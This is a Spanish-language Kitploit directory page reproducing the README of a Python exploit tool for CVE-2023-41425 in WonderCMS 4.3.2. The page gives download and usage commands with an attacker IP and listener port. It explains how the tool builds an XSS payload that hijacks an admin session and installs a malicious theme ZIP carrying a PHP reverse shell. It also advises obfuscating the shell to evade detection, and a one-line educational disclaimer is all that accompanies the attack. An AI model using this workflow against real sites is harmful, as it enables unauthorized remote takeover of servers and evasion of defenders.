Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-41425-RCE-WonderCMS-4.3.2 — Automatiza la creación y alojamiento de un payload JavaScript XSS para instalar un módulo de tema malicioso, desencadenando una reverse shell mediante Ejecución Remota de Código en WonderCMS. Esta herramienta utiliza el script de reverse shell PHP de PentestMonkey como payload. | Kitploit
Herramientas/GitHubGitHub/tea-on/cve-2023-41425-rce-wondercms-4.3.2
Herramientas de PhishingGeneración de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
tea-on/cve-2023-41425-rce-wondercms-4.3.2

CVE-2023-41425-RCE-WonderCMS-4.3.2

Automatiza la creación y alojamiento de un payload JavaScript XSS para instalar un módulo de tema malicioso, desencadenando una reverse shell mediante Ejecución Remota de Código en WonderCMS. Esta herramienta utiliza el script de reverse shell PHP de PentestMonkey como payload.

Ver Repositorio
8hace 1 añoAún no revisado

🚨 Herramienta de Explotación RCE de WonderCMS (CVE-2023-41425)

Esta herramienta ofensiva de seguridad basada en Python automatiza la explotación de una vulnerabilidad de Ejecución Remota de Código (RCE) en WonderCMS 4.3.2, específicamente CVE-2023-41425. Simplifica el proceso de crear un módulo de tema ZIP malicioso y entregar un payload XSS basado en JavaScript para secuestrar una sesión de administrador e implementar una shell reversa PHP.

⚠️ Solo para fines educativos y pruebas de seguridad autorizadas.


📚 Índice de contenido

  • ⚙️ Características
  • 📥 Instalación y Requisitos
  • 🚀 Ejemplos de uso
  • 🧾 Referencia de argumentos
  • 🧠 Flujo de trabajo detallado
  • 🔐 Notas de seguridad
  • 📝 Licencia y atribución

⚙️ Características

  • Genera un archivo ZIP armado con una shell reversa PHP incrustada
  • Crea un payload XSS basado en JavaScript para secuestrar sesiones de administrador
  • Extrae tokens CSRF y automatiza el proceso de instalación del módulo
  • Inicia un servidor HTTP local para alojar archivos de explotación
  • Compatible con Kali Linux, ParrotOS y Python 3.6+

📥 Instalación y Requisitos

🔧 Requisitos

  • Python 3.6+
  • Compatible con Linux y macOS
  • Probado en Kali Linux

📦 Dependencias

El script solo depende de la biblioteca estándar de Python. No se requieren paquetes externos.

🛠 Instalación

UNIX

root@kitploit:~
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip

unzip main.zip

cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main

Windows

root@kitploit:~
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git

cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2

🚀 Ejemplos de uso

💻 Bash

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php

🪟 PowerShell (WSL recomendado)

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php

🧾 Referencia de argumentos


🧠 Flujo de trabajo detallado

Aquí hay un desglose de lo que hace el script internamente:

  1. Análisis de argumentos:

    • Utiliza argparse para recopilar entradas requeridas y opcionales del atacante.
  2. Preparación de la shell reversa:

    • Lee la shell reversa PHP proporcionada.
    • Reemplaza los marcadores de posición $ip y $port con los valores suministrados en -H y -p.
  3. Creación del ZIP malicioso:

    • Crea una estructura de directorio como: <dir_name>/<php_reverse_shell.php>.
    • Lo comprime en <zip_name>.zip.
  4. Generación del payload XSS (script.js):

    • Extrae el token CSRF de la página de inicio de sesión objetivo mediante análisis DOM.
    • Construye la URL de instalación del módulo con el ZIP alojado.
    • Instala el tema malicioso, lo que dispara la shell reversa.
  5. Instrucciones y alojamiento del exploit:

    • Muestra el comando de escucha nc.
    • Muestra la URL completa de entrega XSS.

🔐 Notas de seguridad

  • 🧹 Limpieza: Siempre elimine los ZIP generados, los payloads JS y los registros del servidor HTTP después de su uso.
  • 👀 Detección: El exploit puede ser registrado por WonderCMS o detectado por WAFs.
  • 🧪 Pruebe de manera responsable: Solo ataque sistemas para los que tenga autorización explícita.
  • 🔒 Refuerce las shells reversas: Considere ofuscar o cifrar el payload PHP para evadir la detección.

📝 Licencia y atribución

Esta herramienta se proporciona bajo la Licencia MIT.
Elaborado con 🔥 por TeaOnHack🧋.

  • Referencia CVE: CVE-2023-41425
  • WonderCMS: https://www.wondercms.com/

Este proyecto está destinado solo para evaluaciones de seguridad educativas y autorizadas. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.

Descargar herramienta
ArgumentoRequeridoDescripciónPor defecto
-u✅URL de inicio de sesión de WonderCMS objetivo (ej. http://target/index.php?...)—
-H, --host✅Dirección IP del atacante (para shell reversa)—
-p✅Puerto de escucha del atacante—
-r, --reverse-shell✅Ruta al script PHP de shell reversa—
--dir-name❌Directorio dentro del archivo ZIP del temaTeaOn
--http-port❌Puerto para el servidor HTTP local3000
--zip-name❌Nombre del archivo ZIP generadoreverse-shell
  • Inicia un servidor HTTP simple para alojar tanto el ZIP como los archivos JS.